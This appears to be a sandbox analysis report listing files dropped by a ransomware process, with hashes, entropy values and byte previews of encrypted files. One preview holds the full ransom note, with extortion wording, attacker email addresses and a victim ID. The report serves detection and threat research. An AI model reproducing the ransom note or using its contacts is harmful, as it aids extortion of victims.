                                                                                                    Preview:]1....P...........r(.._=.:..(...T..yE....O..o.....b...N./..v..P.?........0i.._....ByK...u....bQL...UA....O.......((.6.b.^XJ..........C.*..~3.k........B.1Q.._;..~....N.O....VC...k........nL.;..?.X.Jp.......l..x3...~.sP.X+C.1..S.ws..=))...0.q..........:(.fp..i ]...M..ln#,...w?.$N..Lp.I..5)..........[..exJ.9C.]...."..g?....J..T......8.C.)Y=..+.n..Q)..........c..R..5.g..+G^.#M1.7.).T.,.... .....w$s..0.f@*...y2G.!.......=....sR.b*P.xQ..M{..B...m.[..f... .T.I.MP.$?...C3.l.....6k.3oK...5......_9d...o....%S.2T.....yMr.....u..(......Gm....d.-..k.W8 .....O..O..5.~K.EH.G.)...9V......|..#P5^.g....../.J..5..5.....d`.t. -..0.;.9..).m......P..3..^;.:...'m.....YY.}..+.EW...U..a....,.W.......U....S.g..qHku.P...7..p...pW..7.....bX.b.....Vpdz.3q1.&......P.x.oxO.K-...&r`..Hi...M...N.Q..X...n|q....>....... .J).T..sjp}^@t.....@...#Hv..2..o.'r..]..d.XI....5.W..CI.....O.R.Y.?.q......HQ>b5..@.....6..c.0..yF?H#|L.<..t_..J.&..U#.7...^..<>...W....5i
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36762
                                                                                                    Entropy (8bit):5.915425479943547
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:xidS1ywWO5LDC5GhiUY1PVJGvkNwNoXzFS5EJ:xidSAQ52cVIHGvkNwNoXzFS54
                                                                                                    MD5:00D39D589C2761E2E5BECD870E8C173C
                                                                                                    SHA1:D88573A437A7A605C91E6924750F66766EED80A7
                                                                                                    SHA-256:7FDDE0025E0EF1A37F6CC9F2FDC2C53446C138A3F14F17F33536210AB52E63A8
                                                                                                    SHA-512:571D0DCDF3B8CFE41AEEE538381D44CBDCD91C9556751591DE9195673989D02F81701BD4B60085A52171A774C87583FCA7FB22B4DEAC5737F2CBF81EE93CB787
                                                                                                    Malicious:false
                                                                                                    Preview:]1....P...........r(.._=.:..(...T..yE....O..o.....b...N./..v..P.?........0i.._....ByK...u....bQL...UA....O.......((.6.b.^XJ..........C.*..~3.k........B.1Q.._;..~....N.O....VC...k........nL.;..?.X.Jp.......l..x3...~.sP.X+C.1..S.ws..=))...0.q..........:(.fp..i ]...M..ln#,...w?.$N..Lp.I..5)..........[..exJ.9C.]...."..g?....J..T......8.C.)Y=..+.n..Q)..........c..R..5.g..+G^.#M1.7.).T.,.... .....w$s..0.f@*...y2G.!.......=....sR.b*P.xQ..M{..B...m.[..f... .T.I.MP.$?...C3.l.....6k.3oK...5......_9d...o....%S.2T.....yMr.....u..(......Gm....d.-..k.W8 .....O..O..5.~K.EH.G.)...9V......|..#P5^.g....../.J..5..5.....d`.t. -..0.;.9..).m......P..3..^;.:...'m.....YY.}..+.EW...U..a....,.W.......U....S.g..qHku.P...7..p...pW..7.....bX.b.....Vpdz.3q1.&......P.x.oxO.K-...&r`..Hi...M...N.Q..X...n|q....>....... .J).T..sjp}^@t.....@...#Hv..2..o.'r..]..d.XI....5.W..CI.....O.R.Y.?.q......HQ>b5..@.....6..c.0..yF?H#|L.<..t_..J.&..U#.7...^..<>...W....5i
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36752
                                                                                                    Entropy (8bit):5.918460912846145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3pWd/Yj1lay5LDep15GhiUxpY14cVn+mGvkN6z+CAaNoXzFS531nSrDadV:ey5LDC5GhiUY1PVJGvkNwNoXzFS5EI
                                                                                                    MD5:9BF67ED336497D6B9C827AD035D9090C
                                                                                                    SHA1:D6D5E6C22B1D0068533B3592316E20A9B97B35B4
                                                                                                    SHA-256:FC5E62101D27F1B37D5473BC26B25E938188E110D9ABFE7A8399D387E1B50578
                                                                                                    SHA-512:AC0B5DE2162B4566A5FFDDC42E234A571FC29104D09FEBD89A05AEAB6C8775ADDE7E68230306B705B26E3128B290220A65C5640CDA7B856978CDCAFE0C57C12B
                                                                                                    Malicious:true
                                                                                                    Preview:B........{..;!.w.=..zQqV.B.4......W2YE.$B5.._.;.s..........-....H-...>..:..../...."6..P#o......K?..}.7..f...9 s.9.e..Y.T..~..}.bh.i.*.&EBOB.J.N.n9.RIn(.w....6"g...F...6>+,pb.........@...Nv.Q.=S.2.......h....`..H...t...I.U......pj.e0H.d.6J..1..R.KH)..)....k....$.5I...1.6.:+....H.|C.....";.!.xMcI..R...]wTFD..3......t.u4..2[y....3..F............>y.2..t.o..2......x....D1..I..01....D.v..3E....&...=..U.."N.P.....-J...h.]"?.....>...l.....6c.E...y.#..y.....~..qS.....x.G.q.....^..|U.oQ/F....b...|.k....+..;.pL.;....e...._y...@....E.f.d..M..C5..L.x.A7...|m...+..d..V..E.....s2..O.8...2..y..].J2}..e^M..W..N.+.t.m.......b...C..*...kX......4..*&.o\.....h....#,;Zo..Y.L'7U&G...L)os![.!.Gm1...o.X3..#.g... ...v.N.. (...48..3....-Bz.....INH..3PH.+.R...4.(...W.n.8.....Y9....M4..}. .......h.?.1....<&.$l.jq.pQ...._#.........9T^...C......\.../..\w+...z-a,Q...1^3i$..^d.o..\|.hc....l.<.......].A|..Q.0i2....$(.J.....[....D...Uf.Bq.q,...esb..y_...`.2.Qn.eh.r...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36752
                                                                                                    Entropy (8bit):5.918460912846145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3pWd/Yj1lay5LDep15GhiUxpY14cVn+mGvkN6z+CAaNoXzFS531nSrDadV:ey5LDC5GhiUY1PVJGvkNwNoXzFS5EI
                                                                                                    MD5:9BF67ED336497D6B9C827AD035D9090C
                                                                                                    SHA1:D6D5E6C22B1D0068533B3592316E20A9B97B35B4
                                                                                                    SHA-256:FC5E62101D27F1B37D5473BC26B25E938188E110D9ABFE7A8399D387E1B50578
                                                                                                    SHA-512:AC0B5DE2162B4566A5FFDDC42E234A571FC29104D09FEBD89A05AEAB6C8775ADDE7E68230306B705B26E3128B290220A65C5640CDA7B856978CDCAFE0C57C12B
                                                                                                    Malicious:false
                                                                                                    Preview:B........{..;!.w.=..zQqV.B.4......W2YE.$B5.._.;.s..........-....H-...>..:..../...."6..P#o......K?..}.7..f...9 s.9.e..Y.T..~..}.bh.i.*.&EBOB.J.N.n9.RIn(.w....6"g...F...6>+,pb.........@...Nv.Q.=S.2.......h....`..H...t...I.U......pj.e0H.d.6J..1..R.KH)..)....k....$.5I...1.6.:+....H.|C.....";.!.xMcI..R...]wTFD..3......t.u4..2[y....3..F............>y.2..t.o..2......x....D1..I..01....D.v..3E....&...=..U.."N.P.....-J...h.]"?.....>...l.....6c.E...y.#..y.....~..qS.....x.G.q.....^..|U.oQ/F....b...|.k....+..;.pL.;....e...._y...@....E.f.d..M..C5..L.x.A7...|m...+..d..V..E.....s2..O.8...2..y..].J2}..e^M..W..N.+.t.m.......b...C..*...kX......4..*&.o\.....h....#,;Zo..Y.L'7U&G...L)os![.!.Gm1...o.X3..#.g... ...v.N.. (...48..3....-Bz.....INH..3PH.+.R...4.(...W.n.8.....Y9....M4..}. .......h.?.1....<&.$l.jq.pQ...._#.........9T^...C......\.../..\w+...z-a,Q...1^3i$..^d.o..\|.hc....l.<.......].A|..Q.0i2....$(.J.....[....D...Uf.Bq.q,...esb..y_...`.2.Qn.eh.r...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6992
                                                                                                    Entropy (8bit):7.429981359263057
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:G2cByEtfhbzYpZllrTjXFBmLYfmaBgxPnkWEDp/GgK8A6JYVhRsxdxprU64dGihw:ncQELGfj1pOPPnkWeLJA6unSrDadGiA7
                                                                                                    MD5:8A43B643FE58D1BB7EEBBD9CF9C59EA5
                                                                                                    SHA1:777774B692A5E3ABFE0C8426A4CEB75684C59F99
                                                                                                    SHA-256:8F0C5D3E4DEB05C2542688FC888E73D597B48878A178A222C6F16B5D12972B95
                                                                                                    SHA-512:927CFF9AF99B4A4AEA08B2FB69A9524B289DDD66115515C62032FA5C62B29A17046C004BF415EC064E68784F935B98A4D7EBB31228CECA469D1EFAE538427CF0
                                                                                                    Malicious:true
                                                                                                    Preview:y....&(..6.3...:,....D.z..|F..]g.7..){.{8y..'..+.!/.C..X..u.U...i.......[ct.5.....(2Sf,....9..[.h8.H...3`.f.gZo..g{u....,.<..."Y.k....{.......kd...?9...!zF.?i:M..Q/LU...1.'Z..5rI.,5e..MNy;..Q.2.|....r.C ...]..}.....=.K.@;.F.G...3l.....n."z...9..\.O.....)...5......M...5un"...............~m.S..........M..\...&.m..t......{......|.p..a).=m..5..e...".....S..B....^..M.......8.w.X.....R..i.7.E...Y0.V.l..q^.E.)..8.4..s.TM....'....*`.=.3u...C.t..~.Y......./.en.y...xV..!.K.}.@..:....s.....[t....8ST_W.q$.1..e.....7.....q..u..z..^.=2.X.ct...i}....r..UM...w.G.nqH.yf. ..=&@.L...."yT7,m0".)V...*k-.q......s.|.5O.W.......t.'8..SC..i..F.~.mW.b..:G...a.......(..S.~J6..}.....k54.N......so.4.?y....;..(.5.Y]n..Q.`.zB.CE.t].)..["..2..Ni.b...Xg...\.......v.....n..vOg..E...2.<.<J\..qZ...k...%F....8~....0.......#;`...|.w4...xq...2e?+..N.2.O.....nU..#.....t[O./$\ye...Uh..I........4..2....Q3..j.I.......v.....C?.h.&}..?..I.7.ga^$..Fb&M..).P.....(....#.BH.~M....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6992
                                                                                                    Entropy (8bit):7.429981359263057
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:G2cByEtfhbzYpZllrTjXFBmLYfmaBgxPnkWEDp/GgK8A6JYVhRsxdxprU64dGihw:ncQELGfj1pOPPnkWeLJA6unSrDadGiA7
                                                                                                    MD5:8A43B643FE58D1BB7EEBBD9CF9C59EA5
                                                                                                    SHA1:777774B692A5E3ABFE0C8426A4CEB75684C59F99
                                                                                                    SHA-256:8F0C5D3E4DEB05C2542688FC888E73D597B48878A178A222C6F16B5D12972B95
                                                                                                    SHA-512:927CFF9AF99B4A4AEA08B2FB69A9524B289DDD66115515C62032FA5C62B29A17046C004BF415EC064E68784F935B98A4D7EBB31228CECA469D1EFAE538427CF0
                                                                                                    Malicious:false
                                                                                                    Preview:y....&(..6.3...:,....D.z..|F..]g.7..){.{8y..'..+.!/.C..X..u.U...i.......[ct.5.....(2Sf,....9..[.h8.H...3`.f.gZo..g{u....,.<..."Y.k....{.......kd...?9...!zF.?i:M..Q/LU...1.'Z..5rI.,5e..MNy;..Q.2.|....r.C ...]..}.....=.K.@;.F.G...3l.....n."z...9..\.O.....)...5......M...5un"...............~m.S..........M..\...&.m..t......{......|.p..a).=m..5..e...".....S..B....^..M.......8.w.X.....R..i.7.E...Y0.V.l..q^.E.)..8.4..s.TM....'....*`.=.3u...C.t..~.Y......./.en.y...xV..!.K.}.@..:....s.....[t....8ST_W.q$.1..e.....7.....q..u..z..^.=2.X.ct...i}....r..UM...w.G.nqH.yf. ..=&@.L...."yT7,m0".)V...*k-.q......s.|.5O.W.......t.'8..SC..i..F.~.mW.b..:G...a.......(..S.~J6..}.....k54.N......so.4.?y....;..(.5.Y]n..Q.`.zB.CE.t].)..["..2..Ni.b...Xg...\.......v.....n..vOg..E...2.<.<J\..qZ...k...%F....8~....0.......#;`...|.w4...xq...2e?+..N.2.O.....nU..#.....t[O./$\ye...Uh..I........4..2....Q3..j.I.......v.....C?.h.&}..?..I.7.ga^$..Fb&M..).P.....(....#.BH.~M....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9283
                                                                                                    Entropy (8bit):7.060870265651313
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:En/7dcy2vkjO0xIJWs+n7tn9JA6unSrDtTZdmS8F:e/7XEFWG1nSrDhZdmjF
                                                                                                    MD5:20103C34EC1A15207C387524E06C248A
                                                                                                    SHA1:2F130C30367B38114B3A8B666166BD7F84FC1C50
                                                                                                    SHA-256:303A6DD3D6CEF0A2FFD9D4048CB262514D5C1669401C7124068D2E9D2FA9DC6C
                                                                                                    SHA-512:AE5022CAD0E7AE77AC3CE41DF5A042A3713309C37DF14871A2D647AFD376220502C2E08120209BA42F0729AC625EBDDC0E51FFC58B4C9262EBB73F7D48CFD15D
                                                                                                    Malicious:true
                                                                                                    Preview:.(.(E..=........p.n..L.-u....@.3~d-uhO\(H.......sp.b..VE..-..+..}.vp>....9O....6.Z.......!.[.....}..o.....k..-~.......8..`:.......Uw.).}f..r.$.q..S...W.Xv..,.?...p.-T......."...8y..\..L..v....../....'Z. .A.li.!...H.....$.D.........(H..A.q...[..o.r}.${0a.m......T.M......3..p...._0....].5R..h7..0.u.+...Y...X...Q+....Nm.P...7b....T.@.@..V..K......_F..x..M....1.i)...e1 ....OX5kua.?<...Am3.3..%..9.W!.!.l.?....si..3B.?J.Y@.9..|.6.....v...m.|o..)..] ....8p...s..g@qD.~.m$;_8.G..|_,7B....@<...B...@j2.k\ ].T..!..J..,..G...{.+..b<......U_.%......O.....2...V....{|O.'..?......>.<.WE..&t....X.<*.M...9.c.6R...E...Y.4R.Qg.w%V......A>J4..s.o..........^..|.Q...o...+N...'@......XX.O."Q..eJ...{..;..|.[N=B(r......a.....uV........n....G.7....<-.9.q\.../..:.\SO.n...Z..E...T..=.Yf.e......O_.....2vSh.Dv|....#.....N.@.....H.|?7i..>./Z..%..~..V.......A.x.I.kg;...._...HJ......u...Ys...t]..~f...V.Y.E...$....w..m $5...d...f.'.=....}..E.KN..X<....G.z.W.B.........}l.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9283
                                                                                                    Entropy (8bit):7.060870265651313
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:En/7dcy2vkjO0xIJWs+n7tn9JA6unSrDtTZdmS8F:e/7XEFWG1nSrDhZdmjF
                                                                                                    MD5:20103C34EC1A15207C387524E06C248A
                                                                                                    SHA1:2F130C30367B38114B3A8B666166BD7F84FC1C50
                                                                                                    SHA-256:303A6DD3D6CEF0A2FFD9D4048CB262514D5C1669401C7124068D2E9D2FA9DC6C
                                                                                                    SHA-512:AE5022CAD0E7AE77AC3CE41DF5A042A3713309C37DF14871A2D647AFD376220502C2E08120209BA42F0729AC625EBDDC0E51FFC58B4C9262EBB73F7D48CFD15D
                                                                                                    Malicious:false
                                                                                                    Preview:.(.(E..=........p.n..L.-u....@.3~d-uhO\(H.......sp.b..VE..-..+..}.vp>....9O....6.Z.......!.[.....}..o.....k..-~.......8..`:.......Uw.).}f..r.$.q..S...W.Xv..,.?...p.-T......."...8y..\..L..v....../....'Z. .A.li.!...H.....$.D.........(H..A.q...[..o.r}.${0a.m......T.M......3..p...._0....].5R..h7..0.u.+...Y...X...Q+....Nm.P...7b....T.@.@..V..K......_F..x..M....1.i)...e1 ....OX5kua.?<...Am3.3..%..9.W!.!.l.?....si..3B.?J.Y@.9..|.6.....v...m.|o..)..] ....8p...s..g@qD.~.m$;_8.G..|_,7B....@<...B...@j2.k\ ].T..!..J..,..G...{.+..b<......U_.%......O.....2...V....{|O.'..?......>.<.WE..&t....X.<*.M...9.c.6R...E...Y.4R.Qg.w%V......A>J4..s.o..........^..|.Q...o...+N...'@......XX.O."Q..eJ...{..;..|.[N=B(r......a.....uV........n....G.7....<-.9.q\.../..:.\SO.n...Z..E...T..=.Yf.e......O_.....2vSh.Dv|....#.....N.@.....H.|?7i..>./Z..%..~..V.......A.x.I.kg;...._...HJ......u...Ys...t]..~f...V.Y.E...$....w..m $5...d...f.'.=....}..E.KN..X<....G.z.W.B.........}l.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6999
                                                                                                    Entropy (8bit):7.43820696343051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:0H809EdGKg8mCDkr9eKtJA6unSrDadKXJ:P09EdGQlkr9eV1nSrDadKXJ
                                                                                                    MD5:DFF56CD921ED473973A60405795C1351
                                                                                                    SHA1:72EE16CA99DB3B43D2455C39C20D4DDB19345681
                                                                                                    SHA-256:A7AC98E5F86D4D6220F942DEDAB1941B20153E24662CA8224A27683D43446106
                                                                                                    SHA-512:24DA027659E5F42A67F6127123C5ADD9FFA0231FB5CE9D275A2EAE41C24735FA548DB9DB14A6CF2FA64C49A1E533B76EB5F4CAEF8001F2FD346C9F32B0919F79
                                                                                                    Malicious:true
                                                                                                    Preview:.2...Ig|@N.*..F.L.1.%....^.b.8r..m.F.0..9n...q....#........P0....U....H...3.........2..P.t.F<....R......"U.L...s..]z........F..O9.?[..$w..........pNb.9Z...C..[..YC"...s%.Yu"..:<.Nb.}.u....."..r..,l8...5.v.G.i...^._31.25..Q?..QSh'.U......NJ1l.Z..A......|.y3x.?3`.,nO...5Y@O...=U..GwK|.+...<....a../..C.s..y!9.p.eJ...tD...o...(.........S.d..^.8.`.Z..>:.....0h.jB..$.R.dF..1..Z*.m.xhN.....U..k....BWQ$o..x.+.eg.u..`......w....mb....|{c........Z.!..T._.(k.a.w_..G...;5...........P)L~..J..N) ..-:69...D....obD..s.ma..{.h.U3..5..]..N.....<....0c.}:....b.\.........6+.i.G.q....4eL..>..D...gA.)...].#........&..n"w.B.....F.$i....u..;.Q.p.)0".....I).Y{#'.N.fI..G...]I...I.,Ji. ...&..z...*.J...9.}..9H.....w...g..wx.M}..}.n.......r...ub....:[R.N.l..x..M.Q..(Y..2B*.B...M[......o..#...o..A.8..OG.W...-.j..{..../q...@[ ..7....]V..K.>.........</.o..c'..VT3A.....q.^..37W...AY.<...|#eA4..|..h.....d.5.............t...... V.O>....7+.......=.....u.....'.'.+;.L.U
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6999
                                                                                                    Entropy (8bit):7.43820696343051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:0H809EdGKg8mCDkr9eKtJA6unSrDadKXJ:P09EdGQlkr9eV1nSrDadKXJ
                                                                                                    MD5:DFF56CD921ED473973A60405795C1351
                                                                                                    SHA1:72EE16CA99DB3B43D2455C39C20D4DDB19345681
                                                                                                    SHA-256:A7AC98E5F86D4D6220F942DEDAB1941B20153E24662CA8224A27683D43446106
                                                                                                    SHA-512:24DA027659E5F42A67F6127123C5ADD9FFA0231FB5CE9D275A2EAE41C24735FA548DB9DB14A6CF2FA64C49A1E533B76EB5F4CAEF8001F2FD346C9F32B0919F79
                                                                                                    Malicious:false
                                                                                                    Preview:.2...Ig|@N.*..F.L.1.%....^.b.8r..m.F.0..9n...q....#........P0....U....H...3.........2..P.t.F<....R......"U.L...s..]z........F..O9.?[..$w..........pNb.9Z...C..[..YC"...s%.Yu"..:<.Nb.}.u....."..r..,l8...5.v.G.i...^._31.25..Q?..QSh'.U......NJ1l.Z..A......|.y3x.?3`.,nO...5Y@O...=U..GwK|.+...<....a../..C.s..y!9.p.eJ...tD...o...(.........S.d..^.8.`.Z..>:.....0h.jB..$.R.dF..1..Z*.m.xhN.....U..k....BWQ$o..x.+.eg.u..`......w....mb....|{c........Z.!..T._.(k.a.w_..G...;5...........P)L~..J..N) ..-:69...D....obD..s.ma..{.h.U3..5..]..N.....<....0c.}:....b.\.........6+.i.G.q....4eL..>..D...gA.)...].#........&..n"w.B.....F.$i....u..;.Q.p.)0".....I).Y{#'.N.fI..G...]I...I.,Ji. ...&..z...*.J...9.}..9H.....w...g..wx.M}..}.n.......r...ub....:[R.N.l..x..M.Q..(Y..2B*.B...M[......o..#...o..A.8..OG.W...-.j..{..../q...@[ ..7....]V..K.>.........</.o..c'..VT3A.....q.^..37W...AY.<...|#eA4..|..h.....d.5.............t...... V.O>....7+.......=.....u.....'.'.+;.L.U
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):758
                                                                                                    Entropy (8bit):7.726274664717319
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:H5FZ5Yw01BQ3MAZLyvT7sfsUh80uhKSFoWolZYj2JEjuGo30u64GMW/VH/lvuacx:HD/MAZLS3eLh80uYCoWEZjJ/fRGMW9FU
                                                                                                    MD5:805169A2D557E93A085830416DFD8C3D
                                                                                                    SHA1:20CE6D2840FBBFF8867A9DE5E288D1D7E839782F
                                                                                                    SHA-256:F5B225B8D3F23467E58A9211FAB212663320D7E1692170C0C9A459CA6842282E
                                                                                                    SHA-512:5B3F8E10DF1F8FE237B732B993A89A0945814274CC3B35B3A97EBA1D6FF4F024D687E60CCC57D1C8716A7F36E86E9B6F6277A3B5132BC50D2F029BBA60E75103
                                                                                                    Malicious:true
                                                                                                    Preview:.S..&:r..d.!.*....PNC?..&U......a.......s.....x.....<...D).......!?.g}.@j9..F..z.....9.....-.I.......Gu.|...AV..s......[:.3)P..t....9.^zN8.......].tE.,..Nd:...z.teCT...V.^.....f...v.....o7.?....m{....g i.EA>..Sja..i..K......D.9._.U.W<)..8..um.).z.dj.g.)...+.2....e"..lI...);z....d...}.cq|.P.a.......E...........k\.*./...Y.x.....f....!m..^.CR..Gs.H......^_Y..).]6..o.F..DG.{...X...@..J.'........2.%...|O..3.R..z....Ix...p.N.+0=..P...I/......vO.+..f...{..C...8181902c4b"}.=U*.HM^K!.&~...5.....$|....tYT;l..]....G...&....d.."..1..>2C....c.G.m........8.aJ.>C.z.Z...[.~.#i...+E.].L...v..ELr..u.]T.h...-.GU...2...s.%.J.x.ZP...S....u/...2...7.8.....4..._A..._...tE..<`..c.7.>@i....:......l..vx....@.vTO..e.2dWD.b...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):758
                                                                                                    Entropy (8bit):7.726274664717319
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:H5FZ5Yw01BQ3MAZLyvT7sfsUh80uhKSFoWolZYj2JEjuGo30u64GMW/VH/lvuacx:HD/MAZLS3eLh80uYCoWEZjJ/fRGMW9FU
                                                                                                    MD5:805169A2D557E93A085830416DFD8C3D
                                                                                                    SHA1:20CE6D2840FBBFF8867A9DE5E288D1D7E839782F
                                                                                                    SHA-256:F5B225B8D3F23467E58A9211FAB212663320D7E1692170C0C9A459CA6842282E
                                                                                                    SHA-512:5B3F8E10DF1F8FE237B732B993A89A0945814274CC3B35B3A97EBA1D6FF4F024D687E60CCC57D1C8716A7F36E86E9B6F6277A3B5132BC50D2F029BBA60E75103
                                                                                                    Malicious:false
                                                                                                    Preview:.S..&:r..d.!.*....PNC?..&U......a.......s.....x.....<...D).......!?.g}.@j9..F..z.....9.....-.I.......Gu.|...AV..s......[:.3)P..t....9.^zN8.......].tE.,..Nd:...z.teCT...V.^.....f...v.....o7.?....m{....g i.EA>..Sja..i..K......D.9._.U.W<)..8..um.).z.dj.g.)...+.2....e"..lI...);z....d...}.cq|.P.a.......E...........k\.*./...Y.x.....f....!m..^.CR..Gs.H......^_Y..).]6..o.F..DG.{...X...@..J.'........2.%...|O..3.R..z....Ix...p.N.+0=..P...I/......vO.+..f...{..C...8181902c4b"}.=U*.HM^K!.&~...5.....$|....tYT;l..]....G...&....d.."..1..>2C....c.G.m........8.aJ.>C.z.Z...[.~.#i...+E.].L...v..ELr..u.]T.h...-.GU...2...s.%.J.x.ZP...S....u/...2...7.8.....4..._A..._...tE..<`..c.7.>@i....:......l..vx....@.vTO..e.2dWD.b...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):757
                                                                                                    Entropy (8bit):7.725275505602055
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:4ckzAWOjrJForN8ANFNwuF5MMHeAYJADYJmxbkTU4d21dJfPyZ9o79EvFBdrNmn:+zA1jr0rNvwuDps+bkob3JfKiEtbE
                                                                                                    MD5:AF6162C20CF365A94320FD9C8189E35B
                                                                                                    SHA1:30232BE336EC465588F905031D3A0C2B31F4B4F3
                                                                                                    SHA-256:46D4E3C9D35383D82C786BD240B706DFDFDA22F5FE1AB4DA64D06CA5093F6DAC
                                                                                                    SHA-512:BA00C350587B40F9CEC3242AA108F83553037A4A1222268412C7797F8D6803C70703FB5A74840B318FF33A2E02FD947638AD6B6A21057367F8F20D901AC4D570
                                                                                                    Malicious:true
                                                                                                    Preview:..Cb?.....I`j1.B+}}...........i).-.V.3........$.*"f?.5.....dw.w.l..%:f.}.....K..+.W.|..d.z3c..........>..12.-.....xf1.'.........Ol.bM.'....Ki...h...f.F&....}JhG..Ro,.m.1".Z......-. .......F.s.$..S.{....29...sV...X...r.[O~UL8.,u.HF..}%..2...\.Cq....rf.U...V.3.. .J..Z..aL.`.9.......b.`.A...b.~wY..S.......J.:#...+N.D.\.I..:..[=...v..-2.ls....>c.....A."..R....z. .t5.nS.."..(&R.-|0R.....%u(n3..~.M...:y.......w..v;.p.7....*D&...Z..a.......r...u...8u.]l'...#...181902c4b"}/....u./t....h.c..y.).8..Q.|...-v.. ....K..K..Y..:.HW..Z^:"@..C......rht..7.....A.0n~..Ri.........9.86~....2..d.D.h.g]..s......$.ST..%.1(j.|...f...D.n.......#.a....'..1p<.p.. ...*E.;Y.Z"..!Cg......2p.X..z5....6. z.`4.... ..#.J..Qj(..j#..l..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):757
                                                                                                    Entropy (8bit):7.725275505602055
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:4ckzAWOjrJForN8ANFNwuF5MMHeAYJADYJmxbkTU4d21dJfPyZ9o79EvFBdrNmn:+zA1jr0rNvwuDps+bkob3JfKiEtbE
                                                                                                    MD5:AF6162C20CF365A94320FD9C8189E35B
                                                                                                    SHA1:30232BE336EC465588F905031D3A0C2B31F4B4F3
                                                                                                    SHA-256:46D4E3C9D35383D82C786BD240B706DFDFDA22F5FE1AB4DA64D06CA5093F6DAC
                                                                                                    SHA-512:BA00C350587B40F9CEC3242AA108F83553037A4A1222268412C7797F8D6803C70703FB5A74840B318FF33A2E02FD947638AD6B6A21057367F8F20D901AC4D570
                                                                                                    Malicious:false
